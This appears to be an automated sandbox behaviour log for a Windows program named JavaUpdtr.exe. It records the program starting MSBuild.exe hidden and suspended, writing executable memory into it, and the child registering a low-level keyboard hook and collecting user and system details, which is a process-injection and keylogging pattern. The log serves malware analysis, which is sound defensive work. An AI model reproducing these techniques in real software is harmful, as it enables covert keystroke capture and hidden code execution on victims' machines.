Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Process Create process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, os_pid = 0x708, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Thread Get Context process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, os_tid = 0x4ec True 1
Memory Read process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 2130567176, size = 4 True 1
Memory Allocate process_name = C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, address = 0, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 360448 False 1
Process Enumerate Processes - True 1
Process Open desired_access = PROCESS_TERMINATE True 1
Process Terminate exit_code = 4294967295 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Java\JavaUpdtr.exe, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\ntdll.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SYSTEM32\MSCOREE.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNEL32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\KERNELBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ADVAPI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\msvcrt.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\SysWOW64\sechost.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\RPCRT4.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SspiCli.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\CRYPTBASE.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\SHLWAPI.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\GDI32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\LPK.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\USP10.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\IMM32.DLL, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\MSCTF.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\VERSION.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\MSVCR80.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\shell32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\ole32.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\profapi.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\uxtheme.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\system32\WindowsCodecs.dll, size = 2048 True 1
Fn
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 1
Fn
Thread 0x6e4
1 0
Category Operation Information Success Count Logfile
Module Unmap process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe True 1
Fn
Process #8: msbuild.exe
0 0
Information Value
ID #8
File Name c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe
Command Line "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:56, Reason: Child Process
Unmonitor End Time: 00:01:58, Reason: Self Terminated
Monitor Duration 00:00:02
Remark No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x708
Parent PID 0x4e8 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x70C
Process #9: msbuild.exe
182 48
Information Value
ID #9
File Name c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe
Command Line "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:56, Reason: Child Process
Unmonitor End Time: 00:02:26, Reason: Terminated by Timeout
Monitor Duration 00:00:29
OS Process Information
Information Value
PID 0x718
Parent PID 0x4e8 (c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\java\javaupdtr.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x71C, 0x728, 0x72C, 0x7B8, 0x7C4, 0x7C8, 0x7CC, 0x5FC, 0x670, 0x674, 0x650, 0x4EC, 0x4E8
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x005B0000 0x005B0FFF First Execution - 32-bit 0x005B0C1C, 0x005B09C4, ... False False
Threads
Thread 0x71c
125 48
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 2
Fn
System Get Info type = Operating System True 1
Fn
Environment Get Environment String name = appdata, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config, type = file_attributes True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Impersonation Level, data = 3 True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\advapi32.dll, base_address = 0x75db0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = DuplicateTokenEx, address_out = 0x75dbca24 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting, value_name = Default Namespace, data = 114 True 1
Fn
COM Create interface = 3BC15AF2-736C-477E-9E51-238AF8667DCC, cls_context = CLSCTX_INPROC_SERVER True 3
Fn
User Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Fn
System Get Computer Name result_out = XDUWTFONO True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = ProductId, type = REG_NONE False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x75a40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77af25dd True 1
Fn
Module Get Handle module_name = private_0x0000000000400000, base_address = 0x400000 True 2
Fn
Window Create class_name = WindowsForms10.Window.0.app.0.33c0d9d, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = -4, new_long = 2007967197 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgJITDebugLaunchSetting, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgManagedDebugger, type = REG_NONE False 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = -4, new_long = 13112074 True 1
Fn
System Register Hook type = WH_KEYBOARD_LL, hookproc_address = 0xc8162a True 1
Fn
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes True 2
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type True 2
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 True 6
Fn
Data
